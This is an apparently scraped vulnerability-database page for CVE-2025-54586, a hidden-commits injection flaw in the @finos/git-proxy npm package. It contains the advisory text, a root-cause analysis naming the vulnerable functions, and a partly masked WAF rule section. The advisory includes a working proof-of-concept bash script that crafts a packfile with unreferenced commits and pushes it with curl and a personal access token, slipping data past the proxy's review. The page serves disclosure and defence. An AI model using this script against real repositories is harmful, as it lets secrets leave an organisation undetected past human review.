7.1

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-54586

GHSA ID

GHSA-v98g-8rqx-g93g

EPSS Score

CWE

CWE-200

Published

7/30/2025

Updated

7/30/2025

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-54586

CVE-2025-54586: GitProxy Hidden Commits Injection

Summary

An attacker can inject extra commits into the pack sent to GitHub, commits that aren’t pointed to by any branch. Although these “hidden” commits never show up in the repository’s visible history, GitHub still serves them at their direct commit URLs. This lets an attacker exfiltrate sensitive data without ever leaving a trace in the branch view. We rate this a High‑impact vulnerability because it completely compromises repository confidentiality.

Details

The proxy currently trusts only the ref‑update line (oldOid → newOid) and doesn't inspect the packfile’s contents

Because the code only runs git rev-list oldOid..newOid to compute introducedCommits but never checks which commits actually arrived in the pack, a malicious client can append extra commits. Those “hidden” commits won’t be pointed to by any branch but GitHub still stores and serves them by SHA. <img width="2556" height="744" alt="Screenshot 2025-07-16 at 12 29 19" src="https://github.com/user-attachments/assets/abf459a9-310b-4819-a989-797c7e871790" />

PoC

Prerequisites

A GitHub Personal Access Token stored in ~/.github-test-pat.
A test repository also registered in git-proxy, e.g. your-org/test-repo.git, to which you have push rights.

1. Prepare the “visible” and “hidden” commits

# Clone the test repository
git clone http://localhost:8000/your-org/test-repo.git
cd test-repo

# 1. Record the original HEAD
ORIG_COMMIT=$(git rev-parse HEAD)

# 2. Create branch 'foo' and add a visible commit
git checkout -b foo
echo "visible commit" >> file.txt
git add file.txt
git commit -m "Visible commit"
VISIBLE_COMMIT=$(git rev-parse HEAD)

# 3. Go back to the original commit and create a hidden-branch
git checkout $ORIG_COMMIT
git checkout -b hidden-branch
echo "hidden change" > hidden.txt
git add hidden.txt
git commit -m "Hidden commit"
HIDDEN_COMMIT=$(git rev-parse HEAD)

# Return to 'foo'
git checkout foo

2. Push only the visible commit to branch `foo`

git push --set-upstream origin foo
# An authorized user approves this push via your normal review workflow

3. Build and push a pack containing the hidden commit

Create a script named upload-pack.sh (replace the placeholder variables with the SHAs you recorded above):

#!/usr/bin/env bash
REMOTE_URL="http://localhost:8000/your-org/test-repo.git"
REF_NAME="refs/heads/foo"
ORIG_COMMIT="<<ORIG_COMMIT>>"
NEW_COMMIT="<<VISIBLE_COMMIT>>"
OLD_COMMIT="0000000000000000000000000000000000000000"
HIDDEN_COMMIT="<<HIDDEN_COMMIT>>"

# 1. List all objects for the visible and hidden commits
git rev-list --objects --no-object-names "^${ORIG_COMMIT}" ${NEW_COMMIT} > objects.txt
git rev-list --objects --no-object-names "^${ORIG_COMMIT}" ${HIDDEN_COMMIT} >> objects.txt

# 2. Pack them into a single packfile
cat objects.txt
git pack-objects --stdout < objects.txt > packfile

# 3. Construct the Git smart‑protocol update header
printf "${OLD_COMMIT} ${NEW_COMMIT} ${REF_NAME}\0 report-status-v2 side-band-64k object-format=sha1 agent=git/2.39.5" > update_line
UPDATE_LINE_LEN="$(wc -c < update_line)"

printf "%04x" $((UPDATE_LINE_LEN + 4)) > output
cat update_line >> output

# Git smart protocol expects a flush packet
PKT_FLUSH="0000"
printf "%s" "${PKT_FLUSH}" >> output

# Append the packfile
cat packfile >> output

# 4. Send the malicious push via curl
curl -u ${USER}:"$(<~/.github-test-pat)" \
  -X POST "${REMOTE_URL}/git-receive-pack" \
  -H "Content-Type: application/x-git-receive-pack-request" \
  -H "Accept: application/x-git-receive-pack-result" \
  --user-agent "git/2.42.0" \
  --data-binary @output | cat -v

Make it executable:

chmod +x upload-pack.sh

Run it:

./upload-pack.sh

4. Verify the hidden commit

Open in your browser (or via curl):

https://github.com/your-org/test-repo/commit/<<HIDDEN_COMMIT>>

You will see the “Hidden commit”, even though it is not referenced by any branch.

Impact

Data Exfiltration (Confidentiality breach):
Attackers can inject secrets, credentials, or proprietary data into any repository they push to via git-proxy.
Undetectable in UI:
Since the hidden commits never appear in branch graphs, standard code review will not surface them.
Persistence Window:
GitHub retains unreferenced objects for a period long enough to allow automated retrieval before garbage‑collecting them.

(GitHub Advisory)

7.1

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-54586

GHSA ID

GHSA-v98g-8rqx-g93g

EPSS Score

CWE

CWE-200

Published

7/30/2025

Updated

7/30/2025

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
@finos/git-proxy	npm	<= 1.19.1	1.19.2

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability, 'GitProxy Hidden Commits Injection', allows an attacker to inject commits into a repository that are not referenced by any branch, making them hidden from the normal git history. This is possible because the git-proxy was not verifying that the commits contained within the pushed packfile matched the commits that were supposed to be pushed according to the git ref-update information.

The analysis of the patches reveals that the vulnerability is addressed by introducing a new validation step, checkHiddenCommits, into the push processing chain. The functions that were active in the processing chain before this new validation step, and were responsible for handling the user's push data, are the ones considered vulnerable.

Two main functions have been identified:

parsePush.exec: This function is the entry point for parsing the push request. Its original implementation was too simplistic and did not correctly parse and prepare the data for the necessary validation. It was a key enabler of the vulnerability because it didn't set up the necessary checks.
writePack.exec: This function takes the user-provided packfile and writes it to the repository using git receive-pack. This is the function that directly processes the malicious data containing the hidden commits. Before the patch, it did so without any verification.

During an exploit, both of these functions would be called. parsePush.exec would first parse the malicious request, and then writePack.exec would write the malicious packfile to disk. The vulnerability is the absence of a check between these two steps. Therefore, both are critical runtime indicators for this vulnerability.

Vulnerable functions

parsePush.exec

src/proxy/processors/push-action/parsePush.ts

This function is responsible for the initial parsing of a git push request. The original implementation was insufficient and implicitly trusted the client-provided ref-update information without a thorough validation of the accompanying packfile. This lack of validation is the root cause of the vulnerability, as it allowed an attacker to inject hidden commits. The function was processing user-controlled data without proper verification, making it a key part of the exploitation process.

writePack.exec

src/proxy/processors/push-action/writePack.ts

This function is responsible for writing the received packfile to the git repository using the `git receive-pack` command. Before the patch, this function would write any packfile provided by the user without any verification of its contents against the declared ref updates. This allowed an attacker to inject malicious, hidden commits. The patch modifies this function to record the index files generated from the packfile, which are then used by the new `checkHiddenCommits` processor to perform the necessary validation. This function would be present in any runtime profile of an exploit, as it directly handles the malicious data.

WAF Protection Rules

WAF Rule

### Summ*ry *n *tt**k*r **n inj**t *xtr* *ommits into t** p**k s*nt to *it*u*, *ommits t**t *r*n’t point** to *y *ny *r*n**. *lt*ou** t**s* “*i***n” *ommits n*v*r s*ow up in t** r*pository’s visi*l* *istory, *it*u* still s*rv*s t**m *t t**ir *ir**t *

Reasoning

T** vuln*r**ility, '*itProxy *i***n *ommits Inj**tion', *llows *n *tt**k*r to inj**t *ommits into * r*pository t**t *r* not r***r*n*** *y *ny *r*n**, m*kin* t**m *i***n *rom t** norm*l *it *istory. T*is is possi*l* ****us* t** *it-proxy w*s not v*ri*

7.1

Basic Information

Concerned about an active attack path?

CVE-2025-54586: GitProxy Hidden Commits Injection

Summary

Details

PoC

Prerequisites

1. Prepare the “visible” and “hidden” commits

2. Push only the visible commit to branch foo

3. Build and push a pack containing the hidden commit

4. Verify the hidden commit

Impact

7.1

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

2. Push only the visible commit to branch `foo`

Vulnerability Intelligence
Miggo AI